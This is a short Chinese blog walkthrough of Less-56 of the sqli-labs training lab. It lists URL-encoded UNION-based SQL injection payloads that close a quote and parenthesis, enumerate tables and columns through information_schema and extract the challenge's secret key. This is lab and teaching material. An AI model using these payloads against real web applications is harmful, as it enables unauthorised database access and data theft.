码迷,mamicode.com
首页 > 数据库 > 详细

【sqli-labs】 less56 GET -Challenge -Union -14 queries allowed -Variation3 (GET型 挑战 联合查询 只允许14次查询 变化3)

时间:2018-01-31 20:10:17      阅读:190      评论:0      收藏:0      [点我收藏+]

标签:image   com   style   png   iat   引号   tables   data   ase   

技术分享图片

单引号括号闭合

http://192.168.136.128/sqli-labs-master/Less-56/?id=1‘)%23

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-56/?id=0‘) union  select 1,2,database()%23

 技术分享图片

http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0‘) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges‘%23

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0‘) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘challenges‘ and table_name=‘58ONMY4BZG‘%23

 技术分享图片

http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0‘) union select 1,secret_HD4U,3 from 58ONMY4BZG limit 0,1%23

 技术分享图片

 技术分享图片

技术分享图片

 

【sqli-labs】 less56 GET -Challenge -Union -14 queries allowed -Variation3 (GET型 挑战 联合查询 只允许14次查询 变化3)

标签:image   com   style   png   iat   引号   tables   data   ase   

原文地址:https://www.cnblogs.com/superkrissV/p/8393602.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!